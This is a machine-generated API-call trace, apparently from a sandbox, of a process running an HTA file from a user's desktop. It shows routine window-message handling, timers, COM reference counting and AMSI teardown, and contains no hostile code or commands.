[0040.644] StrCmpICW (pszStr1="about:blank", pszStr2="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned -5
[0040.644] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x6
[0040.644] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0040.644] IInternetSecurityManager:MapUrlToZone (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pdwZone=0xb8a8a2f2f0, dwFlags=0x0 | out: pdwZone=0xb8a8a2f2f0*=0xffffffff) returned 0x800c0011
[0040.644] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0040.644] IUnknown:Release (This=0xb8a8c431a0) returned 0x5
[0040.644] GetCurrentThreadId () returned 0x210
[0040.644] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2f790 | out: lpPerformanceCount=0xb8a8a2f790*=413166779) returned 1
[0040.644] SetEvent (hEvent=0x2e0) returned 1
[0040.645] GetCursorPos (in: lpPoint=0xb8a8a2f6f0 | out: lpPoint=0xb8a8a2f6f0*(x=1287, y=746)) returned 1
[0040.645] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f6f0 | out: lpPoint=0xb8a8a2f6f0) returned 1
[0040.645] GetKeyState (nVirtKey=16) returned 0
[0040.645] GetKeyState (nVirtKey=17) returned 0
[0040.645] GetKeyState (nVirtKey=18) returned 0
[0040.645] GetKeyState (nVirtKey=160) returned 0
[0040.645] GetKeyState (nVirtKey=162) returned 0
[0040.645] GetKeyState (nVirtKey=164) returned 0
[0040.645] GetCurrentThreadId () returned 0x210
[0040.645] GetCurrentThreadId () returned 0x210
[0040.646] GetFocus () returned 0x70064
[0040.646] GetCurrentThreadId () returned 0x210
[0040.646] IsWinEventHookInstalled (event=0x8005) returned 0
[0040.646] GetCurrentThreadId () returned 0x210
[0040.646] GetCursorPos (in: lpPoint=0xb8a8a2f610 | out: lpPoint=0xb8a8a2f610*(x=1287, y=746)) returned 1
[0040.646] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f610 | out: lpPoint=0xb8a8a2f610) returned 1
[0040.646] GetKeyState (nVirtKey=16) returned 0
[0040.646] GetKeyState (nVirtKey=17) returned 0
[0040.646] GetKeyState (nVirtKey=18) returned 0
[0040.646] GetKeyState (nVirtKey=160) returned 0
[0040.646] GetKeyState (nVirtKey=162) returned 0
[0040.646] GetKeyState (nVirtKey=164) returned 0
[0040.646] memcpy_s (in: _Destination=0xc0aaadcac0, _DestinationSize=0x18, _Source=0xb8a8a2f338, _SourceSize=0x18 | out: _Destination=0xc0aaadcac0) returned 0x0
[0040.646] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.646] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.646] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.646] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.646] IsCharSpaceW (wch=0x77) returned 0
[0040.646] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.646] IsCharSpaceW (wch=0x77) returned 0
[0040.647] GetCursorPos (in: lpPoint=0xb8a8a2f5e0 | out: lpPoint=0xb8a8a2f5e0*(x=1287, y=746)) returned 1
[0040.647] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f5e0 | out: lpPoint=0xb8a8a2f5e0) returned 1
[0040.647] GetKeyState (nVirtKey=16) returned 0
[0040.647] GetKeyState (nVirtKey=17) returned 0
[0040.647] GetKeyState (nVirtKey=18) returned 0
[0040.647] GetKeyState (nVirtKey=160) returned 0
[0040.647] GetKeyState (nVirtKey=162) returned 0
[0040.647] GetKeyState (nVirtKey=164) returned 0
[0040.647] GetCurrentThreadId () returned 0x210
[0040.647] GetCurrentThreadId () returned 0x210
[0040.647] IsWinEventHookInstalled (event=0x8005) returned 0
[0040.647] GetCurrentThreadId () returned 0x210
[0040.647] GetMessageW (in: lpMsg=0xb8a8a2fbd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb8a8a2fbd0) returned 1
[0040.647] TranslateMessage (lpMsg=0xb8a8a2fbd0) returned 0
[0040.647] DispatchMessageW (lpMsg=0xb8a8a2fbd0) returned 0x0
[0040.647] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0xb8a8c2f4d0
[0040.647] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0
[0040.647] GetMessageW (in: lpMsg=0xb8a8a2fbd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb8a8a2fbd0) returned 1
[0040.647] TranslateMessage (lpMsg=0xb8a8a2fbd0) returned 0
[0040.647] DispatchMessageW (lpMsg=0xb8a8a2fbd0) returned 0x0
[0040.647] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0xb8a8c2f4d0
[0040.647] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.647] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.647] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.647] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.648] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.648] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.648] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.648] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.648] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.648] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.648] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 0
[0040.648] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2f940 | out: lpPerformanceCount=0xb8a8a2f940*=413178877) returned 1
[0040.648] GetTickCount () returned 0x1ca30
[0040.648] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.648] GetCurrentThreadId () returned 0x210
[0040.648] PostMessageW (hWnd=0x50210, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0040.648] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x401, wParam=0x6ecf925, lParam=0x3d09) returned 0x0
[0040.648] GetMessageW (in: lpMsg=0xb8a8a2fbd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb8a8a2fbd0) returned 1
[0040.648] TranslateMessage (lpMsg=0xb8a8a2fbd0) returned 0
[0040.648] DispatchMessageW (lpMsg=0xb8a8a2fbd0) returned 0x0
[0040.648] GetCursorPos (in: lpPoint=0xb8a8a2d730 | out: lpPoint=0xb8a8a2d730*(x=1287, y=746)) returned 1
[0040.648] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2d730 | out: lpPoint=0xb8a8a2d730) returned 1
[0040.648] GetKeyState (nVirtKey=16) returned 0
[0040.648] GetKeyState (nVirtKey=17) returned 0
[0040.648] GetKeyState (nVirtKey=18) returned 0
[0040.648] GetKeyState (nVirtKey=160) returned 0
[0040.648] GetKeyState (nVirtKey=162) returned 0
[0040.648] GetKeyState (nVirtKey=164) returned 0
[0040.648] memcpy_s (in: _Destination=0xc0aaadcae0, _DestinationSize=0x18, _Source=0xb8a8a2d198, _SourceSize=0x18 | out: _Destination=0xc0aaadcae0) returned 0x0
[0040.649] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.649] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.649] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.649] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.649] IsCharSpaceW (wch=0x77) returned 0
[0040.649] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.649] IsCharSpaceW (wch=0x77) returned 0
[0040.649] GetCursorPos (in: lpPoint=0xb8a8a2d440 | out: lpPoint=0xb8a8a2d440*(x=1287, y=746)) returned 1
[0040.649] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2d440 | out: lpPoint=0xb8a8a2d440) returned 1
[0040.649] GetKeyState (nVirtKey=16) returned 0
[0040.649] GetKeyState (nVirtKey=17) returned 0
[0040.649] GetKeyState (nVirtKey=18) returned 0
[0040.649] GetKeyState (nVirtKey=160) returned 0
[0040.649] GetKeyState (nVirtKey=162) returned 0
[0040.649] GetKeyState (nVirtKey=164) returned 0
[0040.649] GetCurrentThreadId () returned 0x210
[0040.649] GetCurrentThreadId () returned 0x210
[0040.649] GetCurrentThreadId () returned 0x210
[0040.649] DestroyWindow (hWnd=0x50226) returned 1
[0040.649] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0040.649] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x46, wParam=0x0, lParam=0xb8a8a2f930) returned 0x0
[0040.650] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x47, wParam=0x0, lParam=0xb8a8a2f930) returned 0x0
[0040.654] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1
[0040.655] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x1c, wParam=0x0, lParam=0xc38) returned 0x0
[0040.655] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x1c, wParam=0x0, lParam=0xc38) returned 0x0
[0040.655] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0xb8a8c2f4d0
[0040.655] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x1c, wParam=0x0, lParam=0xc38) returned 0x0
[0040.655] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x1c, wParam=0x0, lParam=0xc38) returned 0x0
[0040.655] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0040.655] GetAncestor (hwnd=0x70064, gaFlags=0x3) returned 0x5016e
[0040.655] GetAncestor (hwnd=0x0, gaFlags=0x3) returned 0x0
[0040.655] IsChild (hWndParent=0x70064, hWnd=0x0) returned 0
[0040.655] PostMessageW (hWnd=0x70064, Msg=0x491, wParam=0x0, lParam=0x0) returned 1
[0040.655] GetCursorPos (in: lpPoint=0xb8a8a2ed10 | out: lpPoint=0xb8a8a2ed10*(x=1287, y=746)) returned 1
[0040.655] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2ed10 | out: lpPoint=0xb8a8a2ed10) returned 1
[0040.655] GetKeyState (nVirtKey=16) returned 0
[0040.655] GetKeyState (nVirtKey=17) returned 0
[0040.655] GetKeyState (nVirtKey=18) returned 0
[0040.655] GetKeyState (nVirtKey=160) returned 0
[0040.656] GetKeyState (nVirtKey=162) returned 0
[0040.656] GetKeyState (nVirtKey=164) returned 0
[0040.656] GetCursorPos (in: lpPoint=0xb8a8a2ed10 | out: lpPoint=0xb8a8a2ed10*(x=1287, y=746)) returned 1
[0040.656] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2ed10 | out: lpPoint=0xb8a8a2ed10) returned 1
[0040.656] GetKeyState (nVirtKey=16) returned 0
[0040.656] GetKeyState (nVirtKey=17) returned 0
[0040.656] GetKeyState (nVirtKey=18) returned 0
[0040.656] GetKeyState (nVirtKey=160) returned 0
[0040.656] GetKeyState (nVirtKey=162) returned 0
[0040.656] GetKeyState (nVirtKey=164) returned 0
[0040.656] GetCurrentThreadId () returned 0x210
[0040.656] GetCurrentThreadId () returned 0x210
[0040.656] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.656] GetCurrentThreadId () returned 0x210
[0040.656] GetKeyState (nVirtKey=1) returned 0
[0040.656] GetKeyState (nVirtKey=2) returned 0
[0040.656] GetKeyState (nVirtKey=16) returned 0
[0040.656] GetKeyState (nVirtKey=17) returned 0
[0040.656] GetKeyState (nVirtKey=4) returned 0
[0040.656] GetKeyState (nVirtKey=18) returned 0
[0040.656] GetMessageTime () returned 117281
[0040.656] GetMessagePos () returned 0x2ea0507
[0040.656] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x8, wParam=0x0, lParam=0x0, plResult=0xb8a8a2f008 | out: plResult=0xb8a8a2f008) returned 0x1
[0040.656] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0
[0040.656] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.656] GetCurrentThreadId () returned 0x210
[0040.656] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0040.656] GetKeyState (nVirtKey=1) returned 0
[0040.656] GetKeyState (nVirtKey=2) returned 0
[0040.656] GetKeyState (nVirtKey=16) returned 0
[0040.656] GetKeyState (nVirtKey=17) returned 0
[0040.657] GetKeyState (nVirtKey=4) returned 0
[0040.657] GetKeyState (nVirtKey=18) returned 0
[0040.657] GetMessageTime () returned 117281
[0040.657] GetMessagePos () returned 0x2ea0507
[0040.657] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0xb8a8a2ed18 | out: plResult=0xb8a8a2ed18) returned 0x0
[0040.657] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0040.657] GetKeyState (nVirtKey=1) returned 0
[0040.657] GetKeyState (nVirtKey=2) returned 0
[0040.657] GetKeyState (nVirtKey=16) returned 0
[0040.657] GetKeyState (nVirtKey=17) returned 0
[0040.657] GetKeyState (nVirtKey=4) returned 0
[0040.657] GetKeyState (nVirtKey=18) returned 0
[0040.657] GetMessageTime () returned 117281
[0040.657] GetMessagePos () returned 0x2ea0507
[0040.657] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x282, wParam=0x1, lParam=0x0, plResult=0xb8a8a2e198 | out: plResult=0xb8a8a2e198) returned 0x0
[0040.657] GetCurrentThreadId () returned 0x210
[0040.657] PostQuitMessage (nExitCode=0)
[0040.657] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0040.702] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x272, wParam=0x0, lParam=0x0, plResult=0xb8a8a2f700 | out: plResult=0xb8a8a2f700) returned 0x1
[0040.702] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x272, wParam=0x0, lParam=0x0) returned 0x0
[0040.716] GetCurrentThreadId () returned 0x210
[0040.716] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0040.716] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0040.716] GetProcAddress (hModule=0x7ffb3cb20000, lpProcName="RevokeDragDrop") returned 0x7ffb3cb29710
[0040.716] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f220 | out: lpflOldProtect=0xb8a8a2f220*=0x4) returned 1
[0040.716] RevokeDragDrop (hwnd=0x70064) returned 0x0
[0040.743] GetCurrentThreadId () returned 0x210
[0040.743] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0040.743] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x82, wParam=0x0, lParam=0x0, plResult=0xb8a8a2f700 | out: plResult=0xb8a8a2f700) returned 0x1
[0040.743] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
[0040.743] GetCurrentThreadId () returned 0x210
[0040.743] SetWindowLongPtrW (hWnd=0x70064, nIndex=-21, dwNewLong=0x0) returned 0xc0aab08000
[0040.744] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
[0040.744] GetMessageW (in: lpMsg=0xb8a8a2fbd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb8a8a2fbd0) returned 1
[0040.744] TranslateMessage (lpMsg=0xb8a8a2fbd0) returned 0
[0040.744] DispatchMessageW (lpMsg=0xb8a8a2fbd0) returned 0x0
[0040.745] KillTimer (hWnd=0x50210, uIDEvent=0x2002) returned 1
[0040.745] SetCoalescableTimer (hWnd=0x50210, nIDEvent=0x2003, uElapse=0x1f4, lpTimerFunc=0x0, uToleranceDelay=0x0) returned 0x2003
[0040.745] GetTickCount () returned 0x1ca8e
[0040.745] GetCursorPos (in: lpPoint=0xb8a8a2f610 | out: lpPoint=0xb8a8a2f610*(x=1287, y=746)) returned 1
[0040.745] ScreenToClient (in: hWnd=0x0, lpPoint=0xb8a8a2f610 | out: lpPoint=0xb8a8a2f610) returned 0
[0040.746] GetKeyState (nVirtKey=16) returned 0
[0040.746] GetKeyState (nVirtKey=17) returned 0
[0040.746] GetKeyState (nVirtKey=18) returned 0
[0040.746] GetKeyState (nVirtKey=160) returned 0
[0040.746] GetKeyState (nVirtKey=162) returned 0
[0040.746] GetKeyState (nVirtKey=164) returned 0
[0040.746] memcpy_s (in: _Destination=0xc0aaadcb00, _DestinationSize=0x18, _Source=0xb8a8a2f338, _SourceSize=0x18 | out: _Destination=0xc0aaadcb00) returned 0x0
[0040.746] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.746] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.746] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.746] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.746] IsCharSpaceW (wch=0x77) returned 0
[0040.746] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.746] IsCharSpaceW (wch=0x77) returned 0
[0040.746] GetCursorPos (in: lpPoint=0xb8a8a2f5e0 | out: lpPoint=0xb8a8a2f5e0*(x=1287, y=746)) returned 1
[0040.746] ScreenToClient (in: hWnd=0x0, lpPoint=0xb8a8a2f5e0 | out: lpPoint=0xb8a8a2f5e0) returned 0
[0040.746] GetKeyState (nVirtKey=16) returned 0
[0040.746] GetKeyState (nVirtKey=17) returned 0
[0040.746] GetKeyState (nVirtKey=18) returned 0
[0040.746] GetKeyState (nVirtKey=160) returned 0
[0040.746] GetKeyState (nVirtKey=162) returned 0
[0040.747] GetKeyState (nVirtKey=164) returned 0
[0040.747] GetCurrentThreadId () returned 0x210
[0040.747] GetCurrentThreadId () returned 0x210
[0040.747] IsWinEventHookInstalled (event=0x800a) returned 0
[0040.747] GetCurrentThreadId () returned 0x210
[0040.747] GetMessageW (in: lpMsg=0xb8a8a2fbd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb8a8a2fbd0) returned 1
[0040.747] TranslateMessage (lpMsg=0xb8a8a2fbd0) returned 0
[0040.747] DispatchMessageW (lpMsg=0xb8a8a2fbd0) returned 0x0
[0040.747] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0xb8a8c2f4d0
[0040.747] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.747] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.747] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.747] PeekMessageW (in: lpMsg=0xb8a8a2f9a0, hWnd=0x7016c, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0xb8a8a2f9a0) returned 1
[0040.747] PostQuitMessage (nExitCode=0)
[0040.747] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2f940 | out: lpPerformanceCount=0xb8a8a2f940*=413528158) returned 1
[0040.747] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.747] GetCurrentThreadId () returned 0x210
[0040.747] SetCoalescableTimer (hWnd=0x50210, nIDEvent=0x2004, uElapse=0xa, lpTimerFunc=0x0, uToleranceDelay=0x0) returned 0x2004
[0040.747] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.747] GetCurrentThreadId () returned 0x210
[0040.747] SetCoalescableTimer (hWnd=0x50210, nIDEvent=0x2005, uElapse=0x12c, lpTimerFunc=0x0, uToleranceDelay=0x0) returned 0x2005
[0040.747] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.747] GetCurrentThreadId () returned 0x210
[0040.747] GetTickCount64 () returned 0x1ca8e
[0040.747] RedrawWindow (hWnd=0x50210, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1
[0040.747] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x401, wParam=0x7029da4, lParam=0x3d09) returned 0x0
[0040.748] GetMessageW (in: lpMsg=0xb8a8a2fbd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb8a8a2fbd0) returned 0
[0040.748] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.748] GetCurrentThreadId () returned 0x210
[0040.748] PostMessageW (hWnd=0x50210, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0040.748] GetCurrentThreadId () returned 0x210
[0040.748] IUri:GetScheme (in: This=0xb8a8c431a0, pdwScheme=0xb8a8a2f930 | out: pdwScheme=0xb8a8a2f930*=0x9) returned 0x0
[0040.748] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0040.748] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName=0x20f) returned 0x7ffb2eaae1d0
[0040.748] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f740 | out: lpflOldProtect=0xb8a8a2f740*=0x4) returned 1
[0040.748] GetCursorPos (in: lpPoint=0xb8a8a2f730 | out: lpPoint=0xb8a8a2f730*(x=1287, y=746)) returned 1
[0040.748] ScreenToClient (in: hWnd=0x0, lpPoint=0xb8a8a2f730 | out: lpPoint=0xb8a8a2f730) returned 0
[0040.748] GetKeyState (nVirtKey=16) returned 0
[0040.748] GetKeyState (nVirtKey=17) returned 0
[0040.749] GetKeyState (nVirtKey=18) returned 0
[0040.749] GetKeyState (nVirtKey=160) returned 0
[0040.749] GetKeyState (nVirtKey=162) returned 0
[0040.749] GetKeyState (nVirtKey=164) returned 0
[0040.749] memcpy_s (in: _Destination=0xc0aaadcb20, _DestinationSize=0x18, _Source=0xb8a8a2f458, _SourceSize=0x18 | out: _Destination=0xc0aaadcb20) returned 0x0
[0040.749] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.749] IsCharSpaceW (wch=0x77) returned 0
[0040.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.749] IsCharSpaceW (wch=0x77) returned 0
[0040.749] GetCursorPos (in: lpPoint=0xb8a8a2f700 | out: lpPoint=0xb8a8a2f700*(x=1287, y=746)) returned 1
[0040.749] ScreenToClient (in: hWnd=0x0, lpPoint=0xb8a8a2f700 | out: lpPoint=0xb8a8a2f700) returned 0
[0040.749] GetKeyState (nVirtKey=16) returned 0
[0040.749] GetKeyState (nVirtKey=17) returned 0
[0040.749] GetKeyState (nVirtKey=18) returned 0
[0040.749] GetKeyState (nVirtKey=160) returned 0
[0040.749] GetKeyState (nVirtKey=162) returned 0
[0040.749] GetKeyState (nVirtKey=164) returned 0
[0040.750] GetCurrentThreadId () returned 0x210
[0040.750] GetCurrentThreadId () returned 0x210
[0040.750] IsWinEventHookInstalled (event=0x8001) returned 1
[0040.750] NotifyWinEvent (event=0x8001, hwnd=0x50226, idObject=0, idChild=0)
[0040.750] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0xb8a8c39740) returned 0x0
[0040.750] IUnknown:Release (This=0xb8a8c49390) returned 0x1
[0040.750] ISystemDebugEventFire:EndSession (This=0xb8a8c49390) returned 0x0
[0040.750] IUnknown:Release (This=0xb8a8c49390) returned 0x0
[0040.750] GetUserDefaultLCID () returned 0x409
[0040.750] GetACP () returned 0x4e4
[0040.751] GetProcAddress (hModule=0x7ffb30c90000, lpProcName="AmsiUninitialize") returned 0x7ffb30c92490
[0040.751] AmsiUninitialize () returned 0x1
[0040.751] FreeLibrary (hLibModule=0x7ffb30c90000) returned 1
[0040.760] SetEvent (hEvent=0x2e4) returned 1
[0040.761] KillTimer (hWnd=0x50210, uIDEvent=0x2003) returned 1
[0040.761] IUnknown:Release (This=0xb8a8c38780) returned 0x0
[0040.761] IUnknown:Release (This=0xc0aab09280) returned 0x0
[0040.761] IUnknown:Release (This=0x7ffb238e5d88) returned 0x1
[0040.761] CreateUri (in: pwzURI="about:blank", dwFlags=0x1002b84, dwReserved=0x0, ppURI=0xb8a8a2fab0 | out: ppURI=0xb8a8a2fab0*=0xb8a8c2fe40) returned 0x0
[0040.761] IUri:GetScheme (in: This=0xb8a8c2fe40, pdwScheme=0xb8a8a2f9d0 | out: pdwScheme=0xb8a8a2f9d0*=0x11) returned 0x0
[0040.761] IUnknown:QueryInterface (in: This=0xb8a8c2fe40, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2f9a0 | out: ppvObject=0xb8a8a2f9a0*=0xb8a8c2fe40) returned 0x0
[0040.761] IUnknown:Release (This=0xb8a8c2fe40) returned 0x5
[0040.761] IUnknown:AddRef (This=0xb8a8c2fe40) returned 0x6
[0040.761] IUnknown:Release (This=0xb8a8c2fe40) returned 0x5
[0040.761] IUri:IsEqual (in: This=0xb8a8c431a0, pUri=0xb8a8c2fe40, pfEqual=0xb8a8a2fa90 | out: pfEqual=0xb8a8a2fa90*=0) returned 0x0
[0040.761] IUnknown:Release (This=0xb8a8c431a0) returned 0x4
[0040.761] IUnknown:AddRef (This=0xb8a8c2fe40) returned 0x6
